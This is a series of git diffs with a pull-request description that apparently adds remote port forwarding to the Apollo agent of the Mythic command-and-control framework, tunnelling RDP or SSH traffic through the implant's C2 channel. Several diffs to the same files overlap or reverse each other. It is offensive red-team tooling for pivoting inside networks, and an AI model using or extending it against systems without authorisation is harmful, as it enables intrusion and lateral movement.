+                if (addr.IP.AddressFamily == AddressFamily.InterNetwork)
+                {
+                    addrType = Enums.AddressType.IPv4Address;
+                    addrBody = addr.IP.GetAddressBytes();
+                    addrPort = (UInt16)addr.Port;
+                }
+                else if (addr.IP.AddressFamily == AddressFamily.InterNetworkV6)
+                {
+                    addrType = Enums.AddressType.IPV6Address;
+                    addrBody = addr.IP.GetAddressBytes();
+                    addrPort = (UInt16)addr.Port;
+                }
+                else
+                {
+                    //DebugWriteLine($"Failed to format address: {addr.IP.AddressFamily.ToString()}");
+                    return new byte[1];
+                }
+            }
+            else
+            {
+                //DebugWriteLine($"Failed to format address: {addr}");
+                return new byte[1];
+            }
+
+
+            // Format the message
+            msg = new byte[6 + addrBody.Length];
+            msg[0] = socks5Version;
+            msg[1] = BitConverter.GetBytes((uint)resp)[0];
+            msg[2] = 0; // reserved
+            msg[3] = BitConverter.GetBytes((uint)addrType)[0];
+            Array.Copy(addrBody, 0, msg, 4, addrBody.Length);
+            msg[msg.Length - 2] = (byte)(addrPort >> 8);
+            msg[msg.Length - 1] = (byte)(addrPort & 0xff);
+
+            return msg;
+
+        }
+    }
+}

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -220,6 +220,7 @@ namespace Apollo.RPortFwdProxy
                 }
                 default_struct = new PortFwdDatagram[1];
                 default_struct[0] = new PortFwdDatagram() { data = message };
+                return default_struct;
             }
             default_struct = new PortFwdDatagram[1];
             default_struct[0] = new PortFwdDatagram();

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -223,10 +223,10 @@ namespace Apollo.RPortFwdProxy
                     Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> specDatagram = entry.Value.GetMessagesBack();
                     message[entry.Key] = specDatagram;
                 }
-                default_struct = new PortFwdDatagram[0];
+                default_struct = new PortFwdDatagram[1];
                 default_struct[0] = new PortFwdDatagram() { data = message };
             }
-            default_struct = new PortFwdDatagram[0];
+            default_struct = new PortFwdDatagram[1];
             default_struct[0] = new PortFwdDatagram();
             return default_struct;
         }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -284,17 +284,6 @@ namespace Apollo.RPortFwdProxy
         //}
 
 
-        private static void RetrieveDatagram()
-        {
-            while (!exited)
-            {
-                foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
-                {
-                    entry.Value.ReadFromTarget();
-                }
-            }
-        }
-
         //this function will dispatch each data to each connection in the ProxyConnection Object
         private static void DispatchDatagram()
         {

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -87,7 +87,7 @@ namespace Apollo.RPortFwdProxy
         public static Queue messageQueue = new Queue();
         public static Queue messageQueueSendBack = new Queue();
 
-        private static bool exited = true;
+        private static bool exited = false;
 
         private static Queue sendToMythicQueue = new Queue();
         private static Queue syncSendToMythicQueue = Queue.Synchronized(sendToMythicQueue);

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -188,11 +188,6 @@ namespace Apollo.RPortFwdProxy
             // add this object to dictionary map of portforward
 
             // RetrieveDatagram will get Data back to mythic
-            if (is_retriever_active == false)
-            {
-                new Thread(() => RetrieveDatagram()).Start();
-                is_retriever_active = true;
-            }
 
             // DispatchDatagram will read general queue and send data to each proxy connection
             // start thread to keep adding to general queue messages from that proxyconnection object

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -131,13 +131,13 @@ namespace Apollo.RPortFwdProxy
                 if (exited == false)
                 {
 
-                    Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> message = new Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>();
+                    Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<int,String>>>>> message = new Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<int,String>>>>>();
                     List<string> forwards = null;
 		    forwards = new List<string>(proxyConnectionMap.Keys);
 		    
 		    foreach (string entry in forwards)
                     {
-                        Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> specDatagram = proxyConnectionMap[entry].GetMessagesBack();
+                        Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<int,String>>>> specDatagram = proxyConnectionMap[entry].GetMessagesBack();
                         message[entry] = specDatagram;
 			
                     }
@@ -170,7 +170,7 @@ namespace Apollo.RPortFwdProxy
 			//iterate over dictionary dg
                         //for each localport in dictionary, send the rest to the respective to proxyConnectionMap
                         //data will be processed inside ProxyConnection object
-                    foreach(KeyValuePair<string, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> entry in curMsg.data)
+                    foreach(KeyValuePair<string, Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<int,String>>>>> entry in curMsg.data)
                     {
 	                if (proxyConnectionMap.ContainsKey(entry.Key))
 		        {

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -84,7 +84,7 @@ namespace Apollo.RPortFwdProxy
 
         public static Dictionary<string, ProxyConnection> proxyConnectionMap = new Dictionary<string, ProxyConnection>();
 
-        public static Queue messageQueue = new Queue();
+        public static Queue<PortFwdDatagram> messageQueue = new Queue<PortFwdDatagram>();
         public static Queue messageQueueSendBack = new Queue();
 
         private static bool exited = false;

--- a/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
@@ -111,8 +111,6 @@
 #define SLEEP
 #undef SOCKS
 #define SOCKS
-#undef RPORTFWD
-#define RPORTFWD
 #undef SPAWN
 #define SPAWN
 #undef STEAL_TOKEN

--- a/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
@@ -99,6 +99,8 @@
 #define RM
 #undef RMDIR
 #define RMDIR
+#undef RPORTFWD
+#define RPORTFWD
 #undef RUN
 #define RUN
 #undef SCREENSHOT
@@ -430,6 +432,9 @@ namespace Apollo
 #endif
 #if SOCKS
                 { "socks", "Socks" },
+#endif
+#if RPORTFWD
+                { "rportfwd", "RPortFwd" },
 #endif
 #if SPAWN
                 { "spawn", "Spawn" },

--- a/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
@@ -157,6 +157,7 @@ namespace Apollo
             public Mythic.Structs.EdgeNode[] edges;
             public object file_browser;
             public string full_path;
+            public string host;
             public long total_chunks;
             public string message_id;
             public int chunk_num;
@@ -184,6 +185,7 @@ namespace Apollo
                 credentials = null;
                 removed_files = null;
                 artifacts = null;
+                host = null;
 
                 if (userOutput != null && userOutput.GetType() != typeof(string))
                 {
@@ -428,9 +430,6 @@ namespace Apollo
 #endif
 #if SOCKS
                 { "socks", "Socks" },
-#endif
-#if RPORTFWD
-                { "rportfwd", "RPortFwd" },
 #endif
 #if SPAWN
                 { "spawn", "Spawn" },

--- a/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Tasks/Task.cs
@@ -1,4 +1,4 @@
-﻿#define COMMAND_NAME_UPPER
+#define COMMAND_NAME_UPPER
 
 #if DEBUG
 #undef BYPASSUAC
@@ -111,6 +111,8 @@
 #define SLEEP
 #undef SOCKS
 #define SOCKS
+#undef RPORTFWD
+#define RPORTFWD
 #undef SPAWN
 #define SPAWN
 #undef STEAL_TOKEN
@@ -428,6 +430,9 @@ namespace Apollo
 #endif
 #if SOCKS
                 { "socks", "Socks" },
+#endif
+#if RPORTFWD
+                { "rportfwd", "RPortFwd" },
 #endif
 #if SPAWN
                 { "spawn", "Spawn" },

--- a/Payload_Type/Apollo/mythic/MythicPortFwdRPC.py
+++ b/Payload_Type/Apollo/mythic/MythicPortFwdRPC.py
@@ -8,6 +8,7 @@ class MythicPortFwdRPCResponse(RPCResponse):
 
 class MythicPortFwdRPC(MythicBaseRPC):
     async def start_rportfwd(self, port: int,rport: int,rip: str) -> MythicPortFwdRPCResponse:
+        print("starting rportfwd rpc")
         resp = await self.call(
             {
                 "action": "control_rportfwd",
@@ -21,6 +22,7 @@ class MythicPortFwdRPC(MythicBaseRPC):
         return MythicPortFwdRPCResponse(resp)
 
     async def stop_rportfwd(self, port: int) -> MythicPortFwdRPCResponse:
+        print("stopping rportfwd")
         resp = await self.call(
             {
                 "action": "control_rportfwd",

--- a/Payload_Type/Apollo/mythic/MythicPortFwdRPC.py
+++ b/Payload_Type/Apollo/mythic/MythicPortFwdRPC.py
@@ -1,0 +1,52 @@
+from MythicBaseRPC import *
+
+
+class MythicPortFwdRPCResponse(RPCResponse):
+    def __init__(self, rportfwd: RPCResponse):
+        super().__init__(rportfwd._raw_resp)
+
+
+class MythicPortFwdRPC(MythicBaseRPC):
+    async def start_rportfwd(self, port: int,rport: int,rip: str) -> MythicPortFwdRPCResponse:
+        resp = await self.call(
+            {
+                "action": "control_rportfwd",
+                "task_id": self.task_id,
+                "start": True,
+                "port": port,
+                "rport": rport,
+                "rip":rip,
+            }
+        )
+        return MythicPortFwdRPCResponse(resp)
+
+    async def stop_rportfwd(self, port: int) -> MythicPortFwdRPCResponse:
+        resp = await self.call(
+            {
+                "action": "control_rportfwd",
+                "stop": True,
+                "task_id": self.task_id,
+                "port": port,
+            }
+        )
+        return MythicPortFwdRPCResponse(resp)
+
+    async def list_rportfwd(self) -> MythicPortFwdRPCResponse:
+        resp = await self.call(
+            {
+                "action": "control_rportfwd",
+                "list": True,
+                "task_id": self.task_id,
+            }
+        )
+        return MythicPortFwdRPCResponse(resp)
+
+    async def flush_rportfwd(self) -> MythicPortFwdRPCResponse:
+        resp = await self.call(
+            {
+                "action": "control_rportfwd",
+                "flush": True,
+                "task_id": self.task_id,
+            }
+        )
+        return MythicPortFwdRPCResponse(resp)

--- a/Payload_Type/Apollo/mythic/agent_functions/download.py
+++ b/Payload_Type/Apollo/mythic/agent_functions/download.py
@@ -6,11 +6,48 @@ class DownloadArguments(TaskArguments):
 
     def __init__(self, command_line):
         super().__init__(command_line)
-        self.args = {}
+        self.args = {
+            "file": CommandParameter(name="File", type=ParameterType.String, description="File to download."),
+            "host": CommandParameter(name="Host", type=ParameterType.String, description="File to download.", required=False),
+        }
 
     async def parse_arguments(self):
         if len(self.command_line) == 0:
-            raise Exception("Require a path to download.")
+            raise Exception("Require a path to download.\n\tUsage: {}".format(DownloadCommand.help_cmd))
+        filename = ""
+        if self.command_line[0] == '"' and self.command_line[-1] == '"':
+            self.command_line = self.command_line[1:-1]
+            filename = self.command_line
+        elif self.command_line[0] == "'" and self.command_line[-1] == "'":
+            self.command_line = self.command_line[1:-1]
+            filename = self.command_line
+        elif self.command_line[0] == "{":
+            args = json.loads(self.command_line)
+            if args.get("path") != None and args.get("file") != None:
+                # Then this is a filebrowser thing
+                if args["path"][-1] == "\\":
+                    self.args["file"].value = args["path"] + args["file"]
+                else:
+                    self.args["file"].value = args["path"] + "\\" + args["file"]
+                self.args["host"].value = args["host"] 
+            else:
+                # got a modal popup
+                self.load_args_from_json_string(self.command_line)
+        else:
+            filename = self.command_line
+
+        if filename != "":
+            if filename[:2] == "\\\\":
+                # UNC path
+                filename_parts = filename.split("\\")
+                if len(filename_parts) < 4:
+                    raise Exception("Illegal UNC path or no file could be parsed from: {}".format(filename))
+                self.args["host"].value = filename_parts[2]
+                self.args["file"].value = "\\".join(filename_parts[3:])
+            else:
+                self.args["file"].value = filename
+                self.args["host"].value = ""
+
 
 
 class DownloadCommand(CommandBase):

--- a/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
+++ b/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
@@ -1,0 +1,76 @@
+from CommandBase import *
+import json
+from MythicPortFwdRPC import *
+
+class PortFwdArguments(TaskArguments):
+
+    valid_actions = ["start", "stop","list"]
+
+    def __init__(self, command_line):
+        super().__init__(command_line)
+        self.args = {
+            "action": CommandParameter(name="action", choices=["start","stop","list","flush"], required=True, type=ParameterType.ChooseOne, description="Start,stop or list the port forward."),
+            "port": CommandParameter(name="Local Port", required=False, type=ParameterType.Number, description="Port to listen on C2."),
+            "rport": CommandParameter(name="Remote Port", required=False, type=ParameterType.Number, description="Port to be forwarded."),
+            "rip": CommandParameter(name="Remote Ip", required=False, type=ParameterType.Number, description="IP to be forwarded."),
+        }
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise Exception("Must be passed \"start\",\"stop\",\"list\" or \"flush\" commands on the command line.")
+        try:
+            self.load_args_from_json_string(self.command_line)
+        except:
+            parts = self.command_line.lower().split()
+            action = parts[0]
+            port = parts[1]
+            rport = parts[2]
+            rip = parts[3]
+            if action not in self.valid_actions:
+                raise Exception("Invalid action \"{}\" given. Require one of: {}".format(action, ", ".join(self.valid_actions)))
+            self.add_arg("action", action)
+            if action == "start":
+                if port == "":
+                    raise Exception("Invalid Port number given: {}. Must be int.".format(parts[1]))
+                if rport == "":
+                    raise Exception("Invalid Remot Port number given: {}. Must be int.".format(parts[1]))
+                if rip == "":
+                    raise Exception("Invalid Remot IP given: {}. Must be int.".format(parts[1]))
+            if action == "stop":
+                if port == "":
+                    raise Exception("Invalid Port number given: {}. Must be int.".format(parts[1]))
+
+
+class PortFwdCommand(CommandBase):
+    cmd = "rportfwd"
+    needs_admin = False
+    help_cmd = "rportfwd [action] [local port] [remote port] [remote IP]"
+    description = "Forwards the traffic to the selected port and IP through the local Port."
+    version = 1
+    is_exit = False
+    is_file_browse = False
+    is_process_list = False
+    is_download_file = False
+    is_upload_file = False
+    is_remove_file = False
+    author = "@tmayllart"
+    argument_class = PortFwdArguments
+    attackmapping = []
+
+    async def create_tasking(self, task: MythicTask) -> MythicTask:
+        if task.args.get_arg("action") == "start":
+            resp = await MythicPortFwdRPC(task).start_rportfwd(task.args.get_arg("port"),task.args.get_arg("rport"),task.args.get_arg("rip"))
+        if task.args.get_arg("action") == "stop":
+            resp = await MythicPortFwdRPC(task).stop_rportfwd(task.args.get_arg("port"))
+        if task.args.get_arg("action") == "list":
+            resp = await MythicPortFwdRPC(task).list_rportfwd()
+        if task.args.get_arg("action") == "flush":
+            resp = await MythicPortFwdRPC(task).flush_rportfwd()
+        if resp.status == MythicStatus.Success:
+            return task
+        else:
+            task.status = MythicStatus.Error
+        return task
+
+    async def process_response(self, response: AgentResponse):
+        pass

--- a/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
+++ b/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
@@ -63,7 +63,7 @@ class PortFwdCommand(CommandBase):
         if task.args.get_arg("action") == "stop":
             resp = await MythicPortFwdRPC(task).stop_rportfwd(task.args.get_arg("port"))
         if task.args.get_arg("action") == "list":
-            resp = await MythicPortFwdRPC(task).list_rportfwd()
+            return task
         if task.args.get_arg("action") == "flush":
             resp = await MythicPortFwdRPC(task).flush_rportfwd()
         if resp.status == MythicStatus.Success:

--- a/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
+++ b/Payload_Type/Apollo/mythic/agent_functions/rportfwd.py
@@ -12,7 +12,7 @@ class PortFwdArguments(TaskArguments):
             "action": CommandParameter(name="action", choices=["start","stop","list","flush"], required=True, type=ParameterType.ChooseOne, description="Start,stop or list the port forward."),
             "port": CommandParameter(name="Local Port", required=False, type=ParameterType.Number, description="Port to listen on C2."),
             "rport": CommandParameter(name="Remote Port", required=False, type=ParameterType.Number, description="Port to be forwarded."),
-            "rip": CommandParameter(name="Remote Ip", required=False, type=ParameterType.Number, description="IP to be forwarded."),
+            "rip": CommandParameter(name="Remote Ip", required=False, type=ParameterType.String, description="IP to be forwarded."),
         }
 
     async def parse_arguments(self):

--- a/Payload_Type/Apollo/mythic/agent_functions/upload.py
+++ b/Payload_Type/Apollo/mythic/agent_functions/upload.py
@@ -21,6 +21,14 @@ class UploadArguments(TaskArguments):
         if self.command_line[0] != "{":
             raise Exception("Require JSON blob, but got raw command line.")
         self.load_args_from_json_string(self.command_line)
+        remote_path = self.get_arg("remote_path")
+        if remote_path != "" and remote_path != None:
+            remote_path = remote_path.strip()
+            if remote_path[0] == '"' and remote_path[-1] == '"':
+                remote_path = remote_path[1:-1]
+            elif remote_path[0] == "'" and remote_path[-1] == "'":
+                remote_path = remote_path[1:-1]
+            self.add_arg("remote_path", remote_path)
         pass
 
 
@@ -43,7 +51,7 @@ class UploadCommand(CommandBase):
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         original_file_name = json.loads(task.original_params)['File']
         sys.stdout.flush()
-        resp = await MythicFileRPC(task).register_file(task.args.get_arg("file"), saved_file_name=original_file_name)
+        resp = await MythicFileRPC(task).register_file(task.args.get_arg("file"), saved_file_name=original_file_name, delete_after_fetch=False)
         if resp.status == MythicStatus.Success:
             task.args.add_arg("file", resp.agent_file_id)
             task.args.add_arg("file_name", original_file_name)


### PR DESCRIPTION
Hello everyone,

I've added support for remote port forward. It works just like socks functionality. The whole traffic goes through the connection already established with the agent, so, if you forward an RDP/SSH/etc, it will act as a RDP through HTTP.

As mentioned, the traffic goes in a pretty similar way as the socks command: base64 string from the received bytes will be added to a dictionary in the new field of the json message (rportfwds) from/to the agent.

The rportfwd function supports multiple connections to the same port and multiple forwarded ports at the same time.